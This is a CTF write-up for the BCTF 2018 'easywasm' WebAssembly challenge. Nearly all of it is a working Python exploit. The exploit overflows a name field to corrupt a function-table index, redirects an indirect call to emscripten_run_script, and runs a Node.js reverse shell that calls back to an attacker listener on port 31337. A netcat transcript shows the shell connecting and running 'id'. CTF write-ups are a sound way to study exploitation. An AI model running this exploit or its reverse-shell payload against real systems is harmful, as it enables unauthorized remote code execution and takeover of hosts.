CTF/2018

BCTF 2018 - easywasm

pwn3r_45 2018. 12. 6. 20:40

Category : pwnable

Summary : WebAssembly challenge (wasm2c-compiled, see the table dump below); a buffer overflow delivered through change_name overwrites a function-table index, and the resulting out-of-bounds indirect call is steered to emscripten_run_script, giving attacker-controlled JavaScript in the Node.js host.

Exploit

#!/usr/bin/python

from pwn import *
from paul45 import reverse_shell
import requests as r

# Target base URL. '0' is shorthand for 0.0.0.0, which connects to the local
# host, i.e. a local instance of the challenge; point this at the remote box to
# run the exploit live.
URL = 'http://0:23333'

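def add_person(name, is_tutor):
   """Create a person via GET /add_person and return its numeric id.

   name      -- value sent as the ``name`` query parameter
   is_tutor  -- value sent as the ``is_tutor`` query parameter (the exploit passes 1)

   Raises ValueError when the response body does not start with the expected
   ``create person done, person id = `` prefix. The original blindly sliced the
   body at the prefix length, so an error page would either crash with an
   unhelpful int() error or, worse, parse unrelated text as an id.
   """
   prefix = 'create person done, person id = '
   res = r.get(URL + '/add_person', params={'name': name, 'is_tutor': is_tutor}).text
   if not res.startswith(prefix):
      raise ValueError('unexpected /add_person response: %r' % (res,))
   return int(res[len(prefix):])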

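def change_name(idx, new_name):
   """Rename person ``idx`` via GET /change_name and return the raw response body.

   new_name is sent verbatim as the ``name`` query parameter; the exploit uses
   this endpoint to deliver the overflowing payload.

   Raises RuntimeError if the body does not contain ``done``. This replaces the
   original ``assert``: asserts are stripped under ``python -O``, and a failed
   payload delivery must not go unnoticed before intro() is triggered.
   """
   res = r.get(URL + '/change_name', params={'id': idx, 'name': new_name}).text
   if 'done' not in res:
      raise RuntimeError('change_name(%r) failed: %r' % (idx, res))
   return res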

def intro(idx):
   """Fetch GET /intro for person ``idx`` and return the response body unchanged.

   In the exploit this is the call made after the corrupted rename, so the
   interesting output (the reverse shell) presumably arrives on the listener
   rather than in the returned text.
   """
   query = {'id': idx}
   response = r.get(URL + '/intro', params=query)
   return response.text

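# Attacker-side listener for the Node.js reverse shell; must match the host and
# port running ``nc -lv 31337`` (see the transcript below).
pay = reverse_shell('nodejs', ('myserver', 31337))

idx = add_person('pwn3r', 1)
# Payload layout: 60 bytes of filler ('//' followed by 58 dots), a single 0x05
# byte, then the JS reverse shell.
# NOTE(review): the 0x05 appears to land on a function-table index that the
# corrupted indirect call dereferences (the wasm2c table dump below shows the
# emscripten_run_script slot); the leading '//' presumably turns the filler into
# a JS comment once the buffer reaches run_script. Confirm both against the
# binary before reusing this on a different build.
change_name(idx, '//'.ljust(60, '.') + chr(0x5) + pay)
# Parenthesised so the script runs under both Python 2 and Python 3; the
# original bare print statement was Python 2 only.
print(intro(idx))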

'''
  (*Z_envZ_table).data[offset + 23] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)Z_envZ__emscripten_run_scriptZ_vi};
  (*Z_envZ_table).data[offset + 24] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)(&_tutor_hello)};
  (*Z_envZ_table).data[offset + 25] = (wasm_rt_elem_t){func_types[0], (wasm_rt_anyfunc_t)(&f25)};
'''
$ python ex.py 
intro sent to log window

------------------------- 

$ nc -lv 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from X.X.X.X 62017 received!
id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)